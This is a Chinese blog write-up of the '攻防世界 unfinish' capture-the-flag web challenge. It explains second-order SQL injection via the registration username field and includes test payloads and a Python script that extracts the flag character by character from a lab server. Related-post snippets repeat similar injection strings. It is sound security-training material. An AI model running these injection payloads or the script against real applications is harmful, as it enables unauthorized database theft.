攻防世界 unfinish

最新推荐文章于 2024-07-25 11:04:54 发布
最新推荐文章于 2024-07-25 11:04:54 发布
阅读量512 收藏
点赞数 1
分类专栏: 攻防世界 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/114098455
版权
  • 题目描述:sql注入
  • 访问进去是个登录页面
  • dirsearch扫描了一下
    在这里插入图片描述
  • 访问register.php
  • 注册了个账号 登录进去好像没什么用 返回登录页面
  • 但是 这里我想到了一个注入方式 在我写sql注入基础知识的时候提到过 但是 没有仔细研究
  • 二次注入
  • 这里注入的点应该是在register.php页面中的name中
  • 因为邮箱和密码还需要登录时候使用
  • 具体可以看我前面的文章
    在这里插入图片描述
  • 单引号注册失败了 于是我将用户名改为root' and '1这里注册成功了
  • 也就是说这里的闭合方式应该是单引号闭合 且没有我之前学的addslashes()这些转义
  • 这个时候登录进去了 用户名为0
    在这里插入图片描述
  • 所以这里必然是存在sql注入的 但是我在尝试注册name为1' union select 1,database()#的时候
  • 也面返回了一个nnnnoooo!!!!也就是 这里还存在一个过滤????
  • 所以需要用burpsuit fuzz一下
    在这里插入图片描述
  • 过滤了很多东西 information_schema被过滤掉我属实没想到 完全不知道怎么搞了
  • 无奈wp
  • 附上大佬的做题脚本
import requests
import re


register_url = 'http://111.200.241.244:45701/register.php'
login_url = 'http://111.200.241.244:45701/login.php'


for i in range(1, 100):
    register_data = {
        'email': '111@123.com%d' % i,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': 'admin'
    }
    res = requests.post(url=register_url, data=register_data)

    login_data = {
        'email': '111@123.com%d' % i,
        'password': 'admin'
    }
    res_ = requests.post(url=login_url, data=login_data)
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    print(chr(int(code.group(1))), end='')
  • 下面是自己的理解
  • 既然是用户名处可以进行二次注入 并且information_schema被过滤了 想利用union注入肯定是不行的了
  • 在mysql中+号的作用就是将字符转化为数字相加
'1' + '1a' # 2
'0' + database() # 0 
'0' + substr(database(),1,1) # 100 则database()的第一个字符的ascii值就为100
  • 所以核心的注入代码就是
"0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
  • 之后通过正则去获取login.php页面的用户名值就是flag每一位的ascii码值
  • 我要补充mysql知识了 以前学的做现在的题目完全不够用…
海上清辉
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 295
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 841
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界
2401_84302722的博客
05-01 273
【代码】2024年网络安全最新攻防世界Web题 - unseping 总结_unseping攻防世界
攻防世界web进阶区unfinish详解
hxhxhxhxx的博客
08-09 3997
攻防世界web进阶区unfinish详解题目详解 题目 详解 我们使用御剑,扫描一波 我们进入注册页面查看,发现这个,有注册的话猜一下二次注入(这里注入,然后去页面看结果) 我们先拿AWVS试试, 哦~我的上帝,它存在注入 我们试试,burp的fuzz看看他过滤了什么 还是过滤了蛮多的 这些是都没过滤的 既然知道了他是sql注入 那么我们为啥不用sqlmap呢 我们使用sqlmap,发现只能知道这里有注入点,但是过滤很严重 我们需要找找合适的tamper 哦~我的上帝,果然不行,看来还得看看师
【愚公系列】2023年06月 攻防世界-Web(unfinish
时光隧道
06-15 4249
SQL注入是一种常见的攻击方式,它利用web应用程序漏洞,通过向Web应用程序提交恶意的SQL语句,从而获得对数据库的访问权限。SQL注入常见的攻击方式包括:基于错误的注入攻击(error-based):通过构造报错语句,把数据库中的错误信息暴露给攻击者,从而获取敏感信息。基于盲注的攻击(blind-based):攻击者无法直接从Web应用程序获得数据库中的信息,但是他们可以通过提交变异的查询,来判断查询结果是否正确,进而推断出数据库中的信息。
攻防世界----unfinish
qq_44418229的博客
08-02 615
攻防世界--unfinish SQL的二次注入
攻防世界 WEB unfinish
qq_41696858的博客
08-31 137
这题考的是sql注入里的二次注入 看了半天login界面,发现没什么好利用的,考虑是否其他页面有可供利用的注入点 先用dirsearch扫一波,发现register页面,这个页面里多了一个username参数,那么这就是我们这题的关键点,在注册完成后,登录, username会在主页里面回显,而且login界面显然没有对username做过滤, 所以手动尝试payload:1’+'1 只要登陆成功后页面回显的username是2,就说明二次注入成立 下面就是爆破问题 由于过滤了一堆关键字,所以需要通过asc
攻防世界web进阶区之unfinish
qq_45756971的博客
08-08 460
题目:进入所给链接,发现是一个登陆界面 我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flag import requests import time from bs4 import BeautifulSoup #html解析器 def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+
攻防世界-web-unfinish-从0到1的解题历程writeup
CTF小白的博客
04-18 5539
题目分析 题目描述为:SQL 题目主要功能界面分析: 主要分为注册、登陆、以及成功登陆后的一个界面。 通过描述可以知道题目应该存在SQL注入漏洞。 扫描得知注册界面存在SQL注入漏洞 尝试构造sql盲注语句如下 {‘username’: “1’ and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1)...
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
Part_CAE_Unfinish.rar
06-15
《UG在有限元分析中的应用初探》 在现代工程设计中,有限元分析(Finite Element Analysis,简称FEA)是一种广泛使用的数值方法,用于解决各种...通过不断地学习和实践,相信每个初学者都能在有限元的世界中游刃有余。
微信小程序 setData 对 data数据影响问题
10-17
uniqueitem: (id == 'unfinish') ? this.data.itemleft[index] : this.data.itemright[index], baninput: (id == 'unfinish')?false:true }); var that = this; wx.getStorage({ key: 'item', success: ...
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 776
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
企业如何保证公司内网安全
shunyou0526的博客
07-25 383
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1173
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 473
2024安全大模型技术与市场研究报告
CDGA|数据治理:安全如何贯穿数据供给、流通、使用全过程
最新发布
vx15302782362的博客
07-25 345
因此,数据治理的重要性日益凸显,它不仅仅是对数据的简单管理,更是确保数据在供给、流通和使用全过程中安全、合规、高效的关键。通过制定统一的数据标准和数据字典,对来自不同渠道的数据进行清洗、转换和整合,确保数据的一致性和可用性。首先,数据的收集必须遵循合法、合规的原则,确保数据来源的可靠性和数据的准确性。其次,在数据共享和交换过程中,要制定严格的共享规则和交换协议,明确数据的使用范围、使用期限和使用权限。同时,要建立数据共享和交换的审计机制,对共享和交换的数据进行追溯和监控,确保数据的安全和合规使用。
人工智能:大语言模型提示注入攻击安全风险分析报告下载
cybtec的博客
07-25 1060
大语言模型提示注入攻击安全风险分析报告下载
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值